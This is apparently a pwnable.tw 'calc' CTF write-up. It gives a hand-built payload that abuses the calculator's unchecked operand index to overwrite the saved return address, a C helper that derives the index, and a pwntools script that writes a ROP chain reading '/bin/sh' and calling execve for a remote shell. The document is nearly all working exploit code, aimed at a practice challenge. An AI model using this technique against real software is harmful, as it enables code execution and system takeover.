[pwnable.tw] calc
Gyeongje
2018. 7. 24. 02:09
Each line `+N+D` / `+N-D` adds D to slot N of calc's operand array; the operand D is itself stored in slot N+1 on the way, so every D below is the wanted value minus the previous line's D (e.g. 134595399 + 81545 = 0x080701d0). The first line only seeds slot 361 with a known value (1).

+360+1          # seed: the operand 1 lands in slot 361, so the next delta is computed from 1 (presumably; the later numbers only add up under this reading)
+361+134595402  # slot 361 = 0x0805c34b  pop eax ; ret            -- calc()'s saved return address
+362-134595399  # slot 362 = 3           eax = read syscall number
+363+81545      # slot 363 = 0x080701d0  pop edx ; pop ecx ; pop ebx ; ret
+364-81537      # slot 364 = 8           edx = size
+365+135106815  # slot 365 = 0x080ecf80  ecx = buffer (.bss)
+366-135106815  # slot 366 = 0           ebx = fd (stdin)
+367-428159     # slot 367 = 0x08070880  syscall gadget            -> read(0, bss, 8)
+368+134167244  # slot 368 = 0x0805c34b  pop eax ; ret
+369-134167233  # slot 369 = 11          eax = execve syscall number
+370+509711     # slot 370 = 0x080701d0  pop edx ; pop ecx ; pop ebx ; ret
+371-509711     # slot 371 = 0           edx = envp
+372-509711     # slot 372 = 0           ecx = argv
+373+134678641  # slot 373 = 0x080ecf80  ebx = path (.bss, where "/bin/sh" was read)
+374+15         # slot 374 = 0x08070880  syscall gadget            -> execve(bss, 0, 0)
↑ 위 페이로드의 인덱스 360을 구한 계산 코드 (below: the C snippet that derives the index 360 used in the payload above, i.e. the i solving `0xffffc728 + 4*i + 4 == 0xffffcccc`; both addresses come from a debugger session and change with the environment)
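#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

/*
 * Recover the operand-array index used by the calc payload ("+360+...").
 *
 * The original version brute-forced i with MSVC inline asm: it evaluated
 * 0xffffc728 + 4*i + 4 in 32-bit arithmetic and compared it with
 * 0xffffcccc while counting i DOWN from 0xffffffff.  That loop had two
 * defects: `i >= 0` is always true for an unsigned counter, so only the
 * `break` could end it, and because 4*i wraps modulo 2^32 the equation has
 * four solutions -- the first one met when counting down is 0xc0000168,
 * not the 0x168 (360) that is actually usable as an index.  The index is
 * simply (target - base - 4) / 4, so compute it directly.
 *
 * What the two addresses are is not recorded in the writeup.  From their
 * original names, TARGET_ADDR ("re") is presumably the stack slot holding
 * calc()'s saved return address and POOL_BASE ("ed") an address 4 bytes
 * below the first operand slot in the same frame, both read from a
 * debugger.  Confirm against your own session: they are stack addresses
 * and change with the environment (an earlier session used 0xffffc70c as
 * the target).
 */
#define TARGET_ADDR UINT32_C(0xffffcccc)
#define POOL_BASE   UINT32_C(0xffffc728)

/*
 * Solve base + 4*i + 4 == target for i in 32-bit wrap-around arithmetic.
 *
 * target, base: the two stack addresses described above.
 * out:          receives the smallest non-negative solution.
 * Returns 0 on success, -1 when the distance is not a whole number of
 * 4-byte slots (no index can then hit the target exactly).
 */
static int pool_index(uint32_t target, uint32_t base, uint32_t *out)
{
    uint32_t off = target - base - 4u; /* unsigned wrap is well defined */

    if (off % 4u != 0u) {
        return -1;
    }
    *out = off / 4u;
    return 0;
}

int main(void)
{
    uint32_t idx = 0;

    if (pool_index(TARGET_ADDR, POOL_BASE, &idx) != 0) {
        fprintf(stderr,
                "0x%08" PRIx32 " is not slot-aligned relative to 0x%08" PRIx32 "\n",
                TARGET_ADDR, POOL_BASE);
        return 1;
    }
    /* Same output format as the original; prints 0x168 (== 360). */
    printf("%#" PRIx32 "\n", idx);
    return 0;
}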
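#!/usr/bin/env python
"""pwnable.tw "calc": read("/bin/sh") + execve ROP chain delivered through
calc's unbounded operand index.

The service evaluates one expression per line.  As the hand-computed
numbers of the original payload show, an expression `+N+D` / `+N-D` adds or
subtracts D at slot N of the operand array, N is not bounds-checked (slots
past the array reach calc()'s stack frame), and the operand D is itself
stored in slot N+1 on the way.  The generator below relies on that last
point: each line only has to add the difference between the value wanted at
slot N and the previous line's operand (e.g. 134595399 + 81545 ==
0x080701d0).  Index 360 is derived in the accompanying C snippet from two
stack addresses read in a debugger; slot 361 holds calc()'s saved return
address and the chain is written from there.

Gadget addresses are the original author's, for the static i386 binary
shipped with the challenge -- confirm them against your copy.
"""

HOST, PORT = 'chall.pwnable.tw', 10100

# Gadgets (static binary, no PIE).  `sys` in the original is renamed so it
# no longer shadows the stdlib module.
POP_EAX = 0x0805c34b          # pop eax ; ret
POP_EDX_ECX_EBX = 0x080701d0  # pop edx ; pop ecx ; pop ebx ; ret
BSS = 0x080ecf80              # writable scratch where "/bin/sh" is read to
SYSCALL = 0x08070880          # syscall gadget
SYS_READ, SYS_EXECVE = 3, 11  # i386 syscall numbers

SEED_INDEX = 360   # first slot past the operand array (see the C snippet)
CHAIN_INDEX = 361  # calc()'s saved return address

CMD = '/bin/sh\x00'


def build_payload(chain, seed_index=SEED_INDEX, first_index=CHAIN_INDEX):
    """Turn a list of 32-bit values into the calc expressions that write
    them to consecutive slots starting at `first_index`.

    The first expression `+seed+1` only plants the operand 1 in slot
    first_index (== seed_index + 1), giving the chain a known starting
    value; every further expression adds (wanted - previous operand) to its
    slot, exactly as the original hand-computed payload does.  Raises
    ValueError when a delta does not fit a 32-bit int, which the service
    parses operands into.
    """
    lines = ['+%d+1' % seed_index]
    prev_operand = 1
    for offset, want in enumerate(chain):
        idx = first_index + offset
        delta = want - prev_operand
        if delta == 0:
            # A literal 0 operand is avoided (presumably calc drops zero
            # operands; the two-step form needs no assumption either way).
            lines.append('+%d+1' % idx)
            lines.append('+%d-1' % idx)
            prev_operand = 1
            continue
        if not -2 ** 31 <= delta < 2 ** 31:
            raise ValueError('delta %d for slot %d exceeds a 32-bit int' % (delta, idx))
        lines.append('+%d%s%d' % (idx, '+' if delta > 0 else '-', abs(delta)))
        prev_operand = abs(delta)
    return lines


def main():
    import sys
    # Imported lazily so build_payload() can be imported (and tested)
    # without pwntools installed.
    from pwn import process, remote

    chain = [
        POP_EAX, SYS_READ,
        POP_EDX_ECX_EBX, len(CMD), BSS, 0,   # read(fd=0, buf=BSS, size=len(CMD))
        SYSCALL,
        POP_EAX, SYS_EXECVE,
        POP_EDX_ECX_EBX, 0, 0, BSS,          # execve(BSS, argv=0, envp=0)
        SYSCALL,
    ]
    payload = build_payload(chain)

    # `python exploit.py local` runs against ./calc instead of the service.
    s = process('./calc') if 'local' in sys.argv[1:] else remote(HOST, PORT)
    s.recvuntil('===\n')  # end of the banner
    for line in payload:
        s.sendline(line)
        s.recvuntil('\n')  # calc prints the result of every expression
    s.sendline('')  # an empty line makes calc() return -> first gadget
    # Exactly len(CMD) bytes, as many as the read() in the chain asks for;
    # send() rather than sendline() keeps a stray newline out of the shell.
    s.send(CMD)
    s.interactive()


if __name__ == '__main__':
    main()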